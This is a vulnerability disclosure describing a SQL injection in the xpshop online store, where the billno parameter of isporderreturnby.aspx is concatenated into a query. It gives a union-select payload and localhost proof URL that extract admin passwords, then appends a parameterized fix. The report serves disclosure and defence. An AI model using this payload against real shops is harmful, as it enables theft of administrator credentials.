Another SQL injection in the xpshop online store system

Published: 2025-04-13
Revised: 2025-04-13

### Brief description:

There should be just a few more and then I'll call it a day. Actually there are still some left, but I'm feeling tired and don't want to keep going. I'll dig up a few more and then wrap up!

### Detailed description:

Vulnerability location: xpshop.webui.IspOrderReturnBy:

```
protected void Page_Load(object sender, EventArgs e)
{
    base.Response.AddHeader("Pragma", "No-Cache");
    base.Response.Buffer = true;
    base.Response.ExpiresAbsolute = DateTime.Now.AddSeconds(-1.0);
    base.Response.Expires = 0;
    base.Response.CacheControl = "no-cache";
    OrderDB orderDB = new OrderDB();
    // billno comes straight from the request and is passed on unfiltered
    int orderID = orderDB.GetOrderID(base.Request["billno"].ToString());
    this.order = orderDB.GetOrderDetails(orderID);
    // ... (rest of Page_Load not shown)
}
```

Following into the GetOrderID function:

```
public int GetOrderID(string orderNo)
{
    // orderNo is concatenated directly into the SQL text
    return int.Parse(XpShopDB.ExecuteScalar(XpShopDB.ConnectionString, CommandType.Text, "SELECT OrderID FROM Orders WHERE OrderNo = '" + orderNo + "'", null).ToString());
}
```

Same as the others: the input goes straight into the database with no filtering.

payload: /isporderreturnby.aspx?billno=test' union select password from admin--

### Proof of vulnerability:

http://localhost/isporderreturnby.aspx?billno=test' union select password from admin--
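
The hardened counterpart of the concatenated query in GetOrderID, as an added example that is not part of the original report or xpshop's own code. It assumes a SQL Server backend reached through plain ADO.NET; the `OrderLookup` class, the order-number format and the `NVarChar(50)` column type are hypothetical.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;

public static class OrderLookup
{
    // Assumed order-number format (letters, digits, hyphen, up to 32 chars);
    // adjust to whatever the shop actually issues.
    private static readonly Regex OrderNoPattern =
        new Regex(@"\A[A-Za-z0-9\-]{1,32}\z", RegexOptions.CultureInvariant);

    // Returns the OrderID for orderNo, or null when the value is malformed
    // or no such order exists. connectionString is supplied by the caller.
    public static int? GetOrderId(string connectionString, string orderNo)
    {
        // A missing billno arrives as null; reject it and anything
        // off-format before touching the database.
        if (orderNo == null || !OrderNoPattern.IsMatch(orderNo))
            return null;

        const string sql = "SELECT OrderID FROM Orders WHERE OrderNo = @orderNo";

        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            // The value travels as a typed parameter, never as SQL text,
            // so quotes in it cannot change the statement.
            // NVarChar(50) is an assumed column type.
            cmd.Parameters.Add("@orderNo", SqlDbType.NVarChar, 50).Value = orderNo;
            conn.Open();

            object result = cmd.ExecuteScalar();
            // No matching row yields null; the original code would throw
            // on null.ToString() here.
            if (result == null || result == DBNull.Value)
                return null;
            return Convert.ToInt32(result);
        }
    }
}
```

Page_Load would pass `Request["billno"]` to this method and return a generic "order not found" response when the result is null.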
